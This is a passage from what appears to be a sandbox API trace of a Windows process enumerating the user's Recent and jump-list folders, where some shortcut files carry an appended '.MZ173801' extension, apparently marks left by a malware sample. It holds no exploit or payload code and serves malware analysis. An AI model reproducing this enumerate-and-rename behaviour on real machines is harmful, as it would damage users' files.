ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x641e7d87, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="b8ab77100df80ab2.automaticDestinations-ms", cAlternateFileName="B8AB77~1.AUT")) returned 1 [0113.163] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.163] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.163] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x646f8d57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x646f8d57, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x646f8d57, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="b8b3a97bfbf120b6.automaticDestinations-ms", cAlternateFileName="B8B3A9~1.AUT")) returned 1 [0113.163] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.163] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.163] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x672a206a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x672a206a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x672a206a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="d00655d2aa12ff6d.automaticDestinations-ms", cAlternateFileName="D00655~1.AUT")) returned 1 [0113.163] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.163] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.163] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe934f82b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe934f82b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe939bc49, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="e2b05a77dbda5b5c.automaticDestinations-ms", cAlternateFileName="E2B05A~1.AUT")) returned 1 [0113.163] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.400] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.402] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf981f92, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbf981f92, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xa388ec7c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x8e1c, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="f01b4d95cf55d32a.automaticDestinations-ms", cAlternateFileName="F01B4D~1.AUT")) returned 1 [0113.402] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.402] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.402] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67fe51f2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x67fe51f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x67fe51f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="fb3b0dbfee58fac8.automaticDestinations-ms", cAlternateFileName="FB3B0D~1.AUT")) returned 1 [0113.402] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.402] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.402] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67fe51f2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x67fe51f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x67fe51f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="fb3b0dbfee58fac8.automaticDestinations-ms", cAlternateFileName="FB3B0D~1.AUT")) returned 0 [0113.402] GetLastError () returned 0x12 [0113.402] FindClose (in: hFindFile=0xa1bd90 | out: hFindFile=0xa1bd90) returned 1 [0113.402] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb780f46, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb780f46, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa11f103c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="axVy7fvJB.lnk.MZ173801", cAlternateFileName="AXVY7F~1.MZ1")) returned 1 [0113.402] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.402] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.402] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea50696e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea50696e, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa1216ffd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x441, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="aY06BCEf5o.lnk.MZ173801", cAlternateFileName="AY06BC~1.MZ1")) returned 1 [0113.402] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.402] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.402] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x760cdaf7, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x760cdaf7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa1406dcb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="aZ5k5HRyxWcmwTH.lnk.MZ173801", cAlternateFileName="AZ5K5H~1.MZ1")) returned 1 [0113.402] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.402] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.402] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae1d76a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeae1d76a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa142cf64, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x300, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="a_IiCl.lnk.MZ173801", cAlternateFileName="A_IICL~1.MZ1")) returned 1 [0113.403] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.403] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.403] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaa1c4ef, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeaa1c4ef, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa142cf64, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x54c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="b79RtRRk9TDjgGdhgjZ.lnk.MZ173801", cAlternateFileName="B79RTR~1.MZ1")) returned 1 [0113.403] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.403] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.403] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75f95315, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75f95315, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa142cf64, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x473, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="BXHxcreN0NZMlQbLh4Mv.lnk.MZ173801", cAlternateFileName="BXHXCR~1.MZ1")) returned 1 [0113.403] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.403] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.403] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecf0268b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xecf0268b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa14533a2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="cbJumAv3Kocmj1zm.lnk.MZ173801", cAlternateFileName="CBJUMA~1.MZ1")) returned 1 [0113.403] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.403] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.403] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e02d76, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x74e02d76, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa14533a2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="CSedB5fZ.lnk.MZ173801", cAlternateFileName="CSEDB5~1.MZ1")) returned 1 [0113.403] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.403] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.403] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf9a81f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xb6d1c405, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0xb6d1c405, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1 [0113.403] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.403] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.403] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf9a81f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xb6d1c405, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0xb6d1c405, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bc78 [0113.405] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf9a81f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xb6d1c405, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0xb6d1c405, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0113.405] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5bfc86f, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xa5bfc86f, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xa5bfc86f, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x142f, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="28c8b86deab549a1.customDestinations-ms", cAlternateFileName="28C8B8~1.CUS")) returned 1 [0113.405] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0113.405] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.405] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3564a0f, ftCreationTime.dwHighDateTime=0x1d327c2, ftLastAccessTime.dwLowDateTime=0xd3564a0f, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0xd3564a0f, ftLastWriteTime.dwHighDateTime=0x1d327c2, nFileSizeHigh=0x0, nFileSizeLow=0x1544, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="590aee7bdd69b59b.customDestinations-ms", cAlternateFileName="590AEE~1.CUS")) returned 1 [0113.405] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.405] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.405] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f404d4a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x3fa2484c, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0x3fa2484c, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x4ef2, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="6824f4a902c78fbd.customDestinations-ms", cAlternateFileName="6824F4~1.CUS")) returned 1 [0113.405] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.405] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.405] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfad9510, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe96819d1, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe96819d1, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="7e4dca80246863e3.customDestinations-ms", cAlternateFileName="7E4DCA~1.CUS")) returned 1 [0113.405] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.405] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.405] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0effce, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x98e794b5, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x98f80fc0, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9d1f905ce5044aee.customDestinations-ms", cAlternateFileName="9D1F90~1.CUS")) returned 1 [0113.405] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.405] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.405] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf9a81f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe959cb77, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe959cb77, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="f01b4d95cf55d32a.customDestinations-ms", cAlternateFileName="F01B4D~1.CUS")) returned 1 [0113.405] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.405] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.405] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2b77e1, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0xb6cf5ae9, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0xb6cf5ae9, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="f18460fded109990.customDestinations-ms", cAlternateFileName="F18460~1.CUS")) returned 1 [0113.405] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.405] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.405] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2b77e1, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0xb6cf5ae9, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0xb6cf5ae9, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="f18460fded109990.customDestinations-ms", cAlternateFileName="F18460~1.CUS")) returned 0 [0113.405] GetLastError () returned 0x12 [0113.405] FindClose (in: hFindFile=0xa1bc78 | out: hFindFile=0xa1bc78) returned 1 [0113.406] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf9a81f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xb6d1c405, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0xb6d1c405, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bd20 [0113.407] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0113.407] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.407] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf9a81f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xb6d1c405, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0xb6d1c405, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0113.407] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.407] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.407] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5bfc86f, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xa5bfc86f, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xa5bfc86f, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x142f, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="28c8b86deab549a1.customDestinations-ms", cAlternateFileName="28C8B8~1.CUS")) returned 1 [0113.407] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.407] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.407] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3564a0f, ftCreationTime.dwHighDateTime=0x1d327c2, ftLastAccessTime.dwLowDateTime=0xd3564a0f, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0xd3564a0f, ftLastWriteTime.dwHighDateTime=0x1d327c2, nFileSizeHigh=0x0, nFileSizeLow=0x1544, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="590aee7bdd69b59b.customDestinations-ms", cAlternateFileName="590AEE~1.CUS")) returned 1 [0113.407] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.407] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.407] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, 